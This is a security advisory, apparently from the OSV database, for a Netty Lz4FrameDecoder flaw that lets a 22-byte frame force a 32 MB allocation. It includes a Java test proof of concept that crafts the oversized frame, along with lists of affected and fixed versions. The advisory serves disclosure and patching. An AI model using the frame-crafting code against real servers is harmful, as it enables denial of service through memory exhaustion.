GHSA-mj4r-2hfc-f8p6

Suggest an improvement
Source
https://github.com/advisories/GHSA-mj4r-2hfc-f8p6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mj4r-2hfc-f8p6/GHSA-mj4r-2hfc-f8p6.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-mj4r-2hfc-f8p6
Aliases
  • CVE-2026-42583
Downstream
Related
Published
2026-05-07T00:20:35Z
Modified
2026-05-14T20:52:02.730912Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Netty Lz4FrameDecoder is vulnerable to resource exhaustion
Details

Summary

Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation.

Details

io.netty.handler.codec.compression.Lz4FrameDecoder#decode Header fields are trusted for sizing. On the compressed path, after readableBytes >= compressedLength, the decoder does ctx.alloc().buffer(decompressedLength, decompressedLength) then decompresses.

PoC

The test below demonstrates how an attacker sending 22 bytes will force the server to allocate 32MB

    @Test
    void test() throws Exception {
        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            AtomicReference<Throwable> serverError = new AtomicReference<>();
            CountDownLatch latch = new CountDownLatch(1);

            ServerBootstrap server = new ServerBootstrap()
                    .group(workerGroup)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline()
                                    .addLast(new Lz4FrameDecoder())
                                    .addLast(new ChannelInboundHandlerAdapter() {
                                        @Override
                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                            if (cause instanceof DecoderException) {
                                                serverError.set(cause.getCause());
                                            } else {
                                                serverError.set(cause);
                                            }
                                            latch.countDown();
                                        }
                                    });
                        }
                    });

            ChannelFuture serverChannel = server.bind(0).sync();

            Bootstrap client = new Bootstrap()
                    .group(workerGroup)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInboundHandlerAdapter() {
                        @Override
                        public void channelActive(ChannelHandlerContext ctx) {
                            ByteBuf buf = ctx.alloc().buffer(22, 22);
                            buf.writeLong(MAGIC_NUMBER);
                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                            buf.writeIntLE(1);
                            buf.writeIntLE(1 << 25);
                            buf.writeIntLE(0);
                            buf.writeByte(0);

                            ctx.writeAndFlush(buf);

                            ctx.fireChannelActive();
                        }
                    });

            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

            assertTrue(latch.await(10, TimeUnit.SECONDS));

            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());

            clientChannel.channel().close();
            serverChannel.channel().close();
        } finally {
            workerGroup.shutdownGracefully();
        }
    }

Impact

Untrusted senders without per-channel / aggregate limits can stress memory with many small requests.

Database specific 
{
    "cwe_ids": [
        "CWE-400",
        "CWE-770"
    ],
    "nvd_published_at": "2026-05-13T19:17:23Z",
    "severity": "HIGH",
    "github_reviewed_at": "2026-05-07T00:20:35Z",
    "github_reviewed": true
}
References

Affected packages

Maven / io.netty:netty-codec-compression

Package

Name
io.netty:netty-codec-compression
View open source insights on deps.dev
Purl
pkg:maven/io.netty/netty-codec-compression

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.2.13.Final

Affected versions

4.*
4.2.0.Alpha3
4.2.0.Alpha4
4.2.0.Alpha5
4.2.0.Beta1
4.2.0.RC1
4.2.0.RC2
4.2.0.RC3
4.2.0.RC4
4.2.0.Final
4.2.1.Final
4.2.2.Final
4.2.3.Final
4.2.4.Final
4.2.5.Final
4.2.6.Final
4.2.7.Final
4.2.8.Final
4.2.9.Final
4.2.10.Final
4.2.11.Final
4.2.12.Final

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mj4r-2hfc-f8p6/GHSA-mj4r-2hfc-f8p6.json"
last_known_affected_version_range 
"<= 4.2.12.Final"

Maven / io.netty:netty-codec

Package

Name
io.netty:netty-codec
View open source insights on deps.dev
Purl
pkg:maven/io.netty/netty-codec

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.1.133.Final

Affected versions

4.*
4.0.0.Alpha1
4.0.0.Alpha2
4.0.0.Alpha3
4.0.0.Alpha4
4.0.0.Alpha5
4.0.0.Alpha6
4.0.0.Alpha7
4.0.0.Alpha8
4.0.0.Beta1
4.0.0.Beta2
4.0.0.Beta3
4.0.0.CR1
4.0.0.CR2
4.0.0.CR3
4.0.0.CR4
4.0.0.CR5
4.0.0.CR6
4.0.0.CR7
4.0.0.CR8
4.0.0.CR9
4.0.0.Final
4.0.1.Final
4.0.2.Final
4.0.3.Final
4.0.4.Final
4.0.5.Final
4.0.6.Final
4.0.7.Final
4.0.8.Final
4.0.9.Final
4.0.10.Final
4.0.11.Final
4.0.12.Final
4.0.13.Final
4.0.14.Beta1
4.0.14.Final
4.0.15.Final
4.0.16.Final
4.0.17.Final
4.0.18.Final
4.0.19.Final
4.0.20.Final
4.0.21.Final
4.0.22.Final
4.0.23.Final
4.0.24.Final
4.0.25.Final
4.0.26.Final
4.0.27.Final
4.0.28.Final
4.0.29.Final
4.0.30.Final
4.0.31.Final
4.0.32.Final
4.0.33.Final
4.0.34.Final
4.0.35.Final
4.0.36.Final
4.0.37.Final
4.0.38.Final
4.0.39.Final
4.0.40.Final
4.0.41.Final
4.0.42.Final
4.0.43.Final
4.0.44.Final
4.0.45.Final
4.0.46.Final
4.0.47.Final
4.0.48.Final
4.0.49.Final
4.0.50.Final
4.0.51.Final
4.0.52.Final
4.0.53.Final
4.0.54.Final
4.0.55.Final
4.0.56.Final
4.1.0.Beta1
4.1.0.Beta2
4.1.0.Beta3
4.1.0.Beta4
4.1.0.Beta5
4.1.0.Beta6
4.1.0.Beta7
4.1.0.Beta8
4.1.0.CR1
4.1.0.CR2
4.1.0.CR3
4.1.0.CR4
4.1.0.CR5
4.1.0.CR6
4.1.0.CR7
4.1.0.Final
4.1.1.Final
4.1.2.Final
4.1.3.Final
4.1.4.Final
4.1.5.Final
4.1.6.Final
4.1.7.Final
4.1.8.Final
4.1.9.Final
4.1.10.Final
4.1.11.Final
4.1.12.Final
4.1.13.Final
4.1.14.Final
4.1.15.Final
4.1.16.Final
4.1.17.Final
4.1.18.Final
4.1.19.Final
4.1.20.Final
4.1.21.Final
4.1.22.Final
4.1.23.Final
4.1.24.Final
4.1.25.Final
4.1.26.Final
4.1.27.Final
4.1.28.Final
4.1.29.Final
4.1.30.Final
4.1.31.Final
4.1.32.Final
4.1.33.Final
4.1.34.Final
4.1.35.Final
4.1.36.Final
4.1.37.Final
4.1.38.Final
4.1.39.Final
4.1.40.Final
4.1.41.Final
4.1.42.Final
4.1.43.Final
4.1.44.Final
4.1.45.Final
4.1.46.Final
4.1.47.Final
4.1.48.Final
4.1.49.Final
4.1.50.Final
4.1.51.Final
4.1.52.Final
4.1.53.Final
4.1.54.Final
4.1.55.Final
4.1.56.Final
4.1.57.Final
4.1.58.Final
4.1.59.Final
4.1.60.Final
4.1.61.Final
4.1.62.Final
4.1.63.Final
4.1.64.Final
4.1.65.Final
4.1.66.Final
4.1.67.Final
4.1.68.Final
4.1.69.Final
4.1.70.Final
4.1.71.Final
4.1.72.Final
4.1.73.Final
4.1.74.Final
4.1.75.Final
4.1.76.Final
4.1.77.Final
4.1.78.Final
4.1.79.Final
4.1.80.Final
4.1.81.Final
4.1.82.Final
4.1.83.Final
4.1.84.Final
4.1.85.Final
4.1.86.Final
4.1.87.Final
4.1.88.Final
4.1.89.Final
4.1.90.Final
4.1.91.Final
4.1.92.Final
4.1.93.Final
4.1.94.Final
4.1.95.Final
4.1.96.Final
4.1.97.Final
4.1.98.Final
4.1.99.Final
4.1.100.Final
4.1.101.Final
4.1.102.Final
4.1.103.Final
4.1.104.Final
4.1.105.Final
4.1.106.Final
4.1.107.Final
4.1.108.Final
4.1.109.Final
4.1.110.Final
4.1.111.Final
4.1.112.Final
4.1.113.Final
4.1.114.Final
4.1.115.Final
4.1.116.Final
4.1.117.Final
4.1.118.Final
4.1.119.Final
4.1.120.Final
4.1.121.Final
4.1.122.Final
4.1.123.Final
4.1.124.Final
4.1.125.Final
4.1.126.Final
4.1.127.Final
4.1.128.Final
4.1.129.Final
4.1.130.Final
4.1.131.Final
4.1.132.Final

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mj4r-2hfc-f8p6/GHSA-mj4r-2hfc-f8p6.json"
last_known_affected_version_range 
"<= 4.1.132.Final"